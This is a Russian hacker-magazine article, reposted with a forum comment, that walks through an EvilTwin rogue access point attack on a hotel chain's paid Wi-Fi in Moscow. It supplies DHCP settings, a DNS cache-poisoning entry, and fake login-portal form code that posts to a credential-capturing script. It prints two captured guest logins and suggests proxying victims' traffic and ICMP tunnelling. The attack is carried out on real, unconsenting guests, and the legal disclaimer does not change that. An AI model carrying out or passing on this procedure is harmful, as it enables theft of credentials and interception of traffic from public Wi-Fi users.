«Из России с любовью», или чего бояться американцам в гостиницах Павел П. aka ukr-

«Из России с любовью», или чего бояться американцам в гостиницах

Павел П. aka ukr-xblp


/ UST / ustsecurity.info

Реализация атаки EvilTwin в гостиничной сети Marriot

Для получения несанкционированного доступа в корпоративные Wi-Fi сети приходится применять все новые способы атак. К примеру, большинство гостиничных сетей используют зашифрованную передачу учетных записей, что сводит перехват аккаунта на нет. Но, казалось бы, даже самую безвыходную ситуацию нам поможет разрешить новый метод атаки EvilTwin. Об особенностях данного нападения мы сейчас и поговорим.

Из истории...

26 апреля, 2005

«Участники конференции о беспроводных сетях, проходившей на минувшей неделе в Лондоне, подверглись массивной вирусной атаке, — сообщает Viruslist.ru., — Неизвестные злоумышленники проникли в помещение, в котором проходила конференция, и открыли ее участникам доступ к сайту, внешне похожему на ресурс для регистрации в Wi-Fi сети. После регистрации на сайте участники конференции получили на свои компьютеры 45 разных вредоносных программ».

16 мая, 2005

Компания AirDefence, продающая средства защиты беспроводных локальных сетей, предупредила мировую общественность о появлении еще одного способа мошеннических операций против пользователей сервисов беспроводного доступа. По словам пресс-службы AirDefence, суть обнаруженного экспертами компании метода состоит в том, что жертве подсовывается фальшивый интерфейс входа в общественную беспроводную сеть.

1 августа, 2005

Специалист по вопросам безопасности компьютерных сетей Адам Лори, выступая в субботу на конференции Defcon в Лас-Вегасе, описал удручающее состояние в системах защиты современных гостиничных телевизионных сетей. «Система защиты в гостиничных сетях, — резюмировал Лори, — отсутствует как таковая, что открывает простор для злоумышленников».

Это лишь некоторые, из широко описанных в СМИ, примеров того, что тип атаки Rogue AP (EvilTwin) все больше вторгается не только в нашу работу, но и в нашу жизнь. Для тех, кто по каким-либо причинам еще не сталкивался с представленной терминологией, придется пояснить:
Eviltwin – «дьявольский близнец»;
Rogue AP(Accsess Point) - не поддающаяся контролю, неконтролируемая точка доступа.

Два термина, по своей сути, идентичны и уже в расшифровке терминологии описывают вид атак в беспроводных сетях WiFi, основанный на внедрении в радиопространство существующей беспроводной сети, поддельных точек входа в сеть, но таким образом, чтобы для пользователя беспроводной сети данный факт остался незамеченным, «прозрачным».

Для тестирования-демонстрации данного вида атак была выбрана гостиничная сеть Marriot-hotel, включающая в себя несколько отелей в Москве premium-класса (5 звезд) и предлагающая для своих клиентов платный Wi-Fi доступ. Стоимость услуги беспроводного доступа и минимальное время заказа – 300 рублей за 1 час.

Все нижеописанное проверялось на отелях:
Marriot Grand
Marriot Royal Aurora

Все исследование-демонстрация проводилось на стареньком уже ноутбуке P3 с ОС MS Windows 2000 Pro SP4. Как базис. Функции и средства, применяемые в данной статье, прекрасно работают и на более «современных» операционных системах от Microsoft.

Исходные данные

Сканирование радиоэфира на частоте Wi-Fi выявило эту гостиничную сеть и подключенных к ней клиентов:

( SSID ) Type ( BSSID ) [ SNR Sig Noise ] LastChannel

( MoscomNET ) BSS ( 00:0d:29:1d:d7:dd ) [ 33 82 49 ] 0001 11

( MoscomNET ) BSS ( 00:07:85:b3:55:c1 ) [ 19 68 49 ] 0001 06

Это данные по точкам доступа, установленным в гостиничном комплексе. Итак, что нам необходимо знать при проведении атаки EvilTwin?
MAC-адрес точки доступа;
Рабочая частота точки доступа (канал);
Наименование (SSID) атакуемой сети (устройства);
Надо ли вообще проводить атаку EvilTwin? Не даст ли нам требуемой информации перехват сниферами беспроводного трафика?
«Популярность» данной публичной коммерческой беспроводной сети. Толку сидеть и ждать у моря погоды, если услугой пользуется директор заведения раз в сутки? Соответственно, эффективность атаки очень сильно зависит от числа обращений, подключения к сети, новых пользователей или ротация старых.
Сила сигнала точки доступа. Мы не будем нарушать заданный режим работы имеющегося оборудования в компании. «Гасить» реальные точки доступа не потребуется, хотя зачастую необходимость проведения DOS-атак на объекты инфраструктуры сети стоит очень остро.

В данном случае мы имеем:
Имя сети: MoscomNET
MAC-адрес: 00:0d:29:1d:d7:dd – сравнивая первые 3 октета MAC-адреса в базе OUI, становится понятно, что используется оборудование компании Cisco Systems.
Канал – 11.

Далее нас будет интересовать сетевая адресация, применяемая в сегменте сети:

Листинг: результат команды ipconfig /all

Настройка протокола IP для Windows 2000

Имя компьютера . . . . . . . . . : usthead1

Основной DNS-суффикс . . . . . . :

Тип узла . . . . . . . . . . . . : Гибридный

Включена IP-маршрутизация . . . . : Нет

Доверенный WINS-сервер . . . . . : Нет

Адаптер UST_WiFi_drvr:

DNS суффикс этого подключения . . :

Описание . . . . . . . . . . . . : UST_WiFi_drvr_Compx

Физический адрес. . . . . . . . . : 00-80-48-2B-84-34

DHCP разрешен . . . . . . . . . . : Да

Автонастройка включена . . . . . : Да

IP-адрес . . . . . . . . . . . . : 10.43.1.155

Маска подсети . . . . . . . . . . : 255.255.0.0

Основной шлюз . . . . . . . . . . : 10.43.1.1

DHCP-сервер . . . . . . . . . . . : 10.43.1.1

DNS-серверы . . . . . . . . . . . : 212.130.104.10

195.68.135.5

Основной WINS-сервер . . . . . . : 10.43.1.1

Собственно говоря, комментарии излишни. При попытке инициализации какой-либо http-сессии (обращении на какой-либо сайт) мы видим форму аутентификации в системе, оповещающую нас о поставщике услуг беспроводной связи и двухфакторной аутентификации в виде логина и пароля, каждый из которых состоит из 4-х цифровых символов. Аутентификация проходит с применением безопасного доступа HTTP Secured с применением SSL. Что, в свою очередь, практически сводит на нет перехват реквизитов доступа с помощью многочисленных беспроводных сниферов, к примеру, тем же самым, неоднократно упоминавшимся на страницах журнала Kismet’ом.

В итоге наша задача состоит из следующих этапов:

1. Поднятие своей точки доступа:
обеспечение подключения клиентов к своей точке доступа в режиме Infrastructure;
предоставление нашей точкой доступа DNS-, DHCP-сервисов.
2. Создание ложного веб-сервиса, эмулирующего работу реальной аутентификационной панели.

Конечная задача – доступ к выданным пользователям реквизитам доступа, аккаунтам на пользование услугами связи.

Исходное аппаратное и программное обеспечение:
Ноутбук, уже упоминавшийся выше;
Для реализации точки доступа на ноутбуке и превращения его в роутер есть три пути:
У тебя уже есть адаптер на чипсете agere/hermes, штатными средствами которого ты можешь перевести режим работы не только в ad-hoc (точка-точки) или infrastructure (многоточие-точка), но и в режим act as base station, то есть эмуляции точки доступа.
Использование программного средства SoftAP (http://www.pctel.com/softap.php), при условии, что имеющийся у тебя клиентский Wi-Fi адаптер поддерживается данным продуктом. Эта софтина платная.
SoftAP стоит порядка $30. За эту же сумму предпочтительнее обзавестить адаптером. Из использовавшихся в данном случае – это Compex WL11B, примечательной особенностью которого является не только чипсет Agere Hermes, но и наличие MC-MX разъема для подключения внешней антенны или усилителя. А цена его в московских магазинах — чуть меньше стоимости SoftAP.
3. В качестве DNS-сервера рекомендую использовать TreeWalk (http://ntcanuck.com). Преимущества: бесплатен, поддержка bind, простая конфигурация и использование.
4. В качестве DHCP-сервера рекомендую использовать NusyDHCP (http://sourceforge.net/projects/loosydhcp/). Преимущества аналогичны TreeWalk.
5. Веб-сервер Apache в пояснениях не нуждается. Будет использоваться данная сборка: apache_2.0.58-win32-x86-no_ssl.msi
6. Интерпретатор Perl в реализации ActiveState Perl в одной из последних сборок: ActivePerl-5.8.6.811-MSWin32-x86-122208.msi
7. Airsnarf for Windows от исследовательской группы Shmoo, которые одними из первых поведали отрасли и бизнесу об атаке RogueAP (http://airsnarf.shmoo.com).

В атаку!

Для места проведения атаки (установки точки доступа) был выбран ресторан в фойе гостиничного комплекса, где уже находились пользователи Wi-Fi. Место размещения обусловлено тем, что сила сигнала моей точки доступа должна превышать силу сигнала реальных точек доступа. Это сделано намеренно: ведь клиентские адаптеры при выборе сети для соединения, имеющих одинаковые идентификаторы (ssid+mac+channel), изберут точку с наиболее высокими показателями уровня сигнала.

Поэтому мой Wi-Fi адаптер был переведен в режим точки доступа, а идентификатор сети был выбран MoscomNET.

Присоединяясь к сети, мы уже получили представление о применяемой сетевой адресации, поэтому необходимо было внести в конфигурационный файл DHCP-сервера dhcpd.conf следующие строки:

subnet 255.255.0.0

router 10.43.1.1

dns 10.43.1.1

wins 10.43.1.1

В файле dhcp.iplist необходимо указать диапазон выдачи IP-адресов:

10.43.1.150

10.43.1.154

Единственное отличие, по сравнению с атакуемым сегментом, – это адрес DNS-сервера, в качестве которого выступает мой ноутбук.
Собственно говоря, следующим шагом мы произведем локальный DNS cache poisoning. Через управляющую панель DNS-сервера останавливаем сервис. После остановки сервиса потребуется отредактировать кэш сервера по следующему пути:

C:\\system32\dns\etc\named.cache

Редактирование заключается во внесении следующих строк в конфиг:

;local

www.xakep.ru 155000 A 10.43.1.1

Теперь все присоединенные ко мне клиенты беспроводной сети, захотев почитать новости на нашем сайте, получат ответ от локального веб-сервера, установленного на ноутбуке.

Веб-сервер мы настроим следующим образом: обязательно сохраним аутентификационную страницу с приглашением ввода данных аккаунта в /htdocs и исправим пути к файлам изображений. Для достижения цели вместо исходной процедуры:

<FORM name=form1 onsubmit=return(CheckForm()); action=/moscom/portal.asp?action=billing&sig=cfb0e305ecc3825baca2caed4f6449ea method=post>

вставим скрипт перехвата данных Airsnarf.

В исходный код заглавной страницы внесем:

<form action="/cgi-bin/airsnarf.cgi" method="post">

и

<input type="text" name="username"> - <input type="password" name="password"><br>

<input type="submit" value="Continue">

После выполнения данных мероприятий остается ждать. На моем стареньком ноутбуке батарейки хватает на 3 часа. За два часа, проведенных за распитием кофе в отеле, были скомпрометированы две учетные записи пользователей.

Хочу заметить: смена MAC-адреса своего адаптера на MAC-адрес атакуемой сети желательна, но не обязательна. Все равно стандартные клиент-менеджеры беспроводного адаптера на ноутбуках (включая менеджер Беспроводной связи от Microsoft) покажут только одну сеть...

Увидев в окне вывода DHCP-сервера информацию о запросе-выдачи IP-адреса, уже можно с большей вероятностью предположить, что в файле marriot.txt мы увидим 8 заветных цифр.
Листинг: Лог выдачи IP-адреса DHCP-сервером

INFO: Moreton Bay DHCP Server (v0.8.25-3 WIN) started

INFO: Listening for DHCP messages on network...

INFO: oooh, got some!

INFO: Alarm off

INFO: received a DHCPDISCOVER

INFO: Searching for address for new client...

INFO: file yielded valid MAC/IP pair - ip_addr = 200000a

INFO: received a DHCPREQUEST

INFO: 0a000001

INFO: Sending ACK

INFO: Entering cycle - Number of current offers = 1

INFO: cycle No - 0

INFO: chaddr matches what we have in our internel offer array

INFO: Sending ACK for ip_addr 10.43.1.2

INFO: got a valid MAC/IP pair from dhcpd.leases

INFO: ip_addr taken = 200000a

INFO: Alarm On

INFO: Listening for DHCP messages on network...

Вот и первый клиент присоединился к нашей поддельной точке доступа.

Просмотрев позже файл с результатом перехвата, я обнаружил учетные записи:

url = localhost, password = 5498, username = 3498

url = localhost, password = 1038, username = 7624

Целью нашей атаки ставилось получение только реквизитов доступа. Как продолжение данной атаки можно предложить следующий путь: придать своей точки доступа функции транспарентной прокси и «пропускать» весь трафик через себя. То есть под перехваченным аккаунтом доступа самому осуществить подключение через второй адаптер на ноутбуке к реальной сети, а для скомпрометированных пользователей услуги доступа к интернету выполнять самим.
Стоит также отметить, что в Wi-Fi сети Mariott были обнаружены уязвимости, допущенные при построении сети, в небезопасной настройке самих точек доступа.

Межсетевой экран пропускает в интернет ICMP-запросы и возвращает ответы, что позволяет нам организовать простейший ICMP-туннель со своим сервером в интернете, используя ресурсы гостиничной сети.

C:\>ping www.ru

Обмен пакетами с www.ru [194.87.0.50] по 32 байт:

Ответ от 194.87.0.50: число байт=32, время=8мс, TTL=55

При приблизительном исследовании исходного портала для аутентификации я быстро нашел XSS в default.asp, что еще раз подчеркивает халатность администраторов.

Резюме

Продемонстрированный простейший способ атаки применим в большинстве коммерческих публичных хотспотов (сетей Wi-Fi доступа). Обычно данные компании не затрудняют себя покупкой оборудования, которое противодействует атаке RogueAP. При атаке на корпоративную внутреннюю сеть ты можешь столкнуться с тем, что:
Служба безопасности, используя сканеры беспроводного эфира и применяя методы триангуляции, быстро вычислит местонахождение твоей точки доступа и настучит дубинкой по почкам;
Твоя точка доступа будет атакована DOS-атакой со стороны защитных механизмов, а клиенты корпоративной сети, подсоединяясь к тебе, будут получать deassociation frames, приводящие к разрыву соединений между тобой и клиентами.
Воровать чужие пароли нехорошо — тебя будут мучить угрызения совести .

DANGER

Все действия проводились лишь в ознакомительных целях. За использование материала в незаконных целях автор и редакция ответственности не несут.

##################################

Взято сhttp://www.xakep.ru/magazine/xa/092/070/1.asp

 

Атака прокатывает, когда народу много сидит, у нас например в городе сколько не пытался осуществить данный вид атаки, во всех местах(а их немного) где стоят подобные серверы аутентификации, клиентов не особо много, а ждать по пол дня пока зайдет один человек посидеть в интернете пол часа бессмысленно...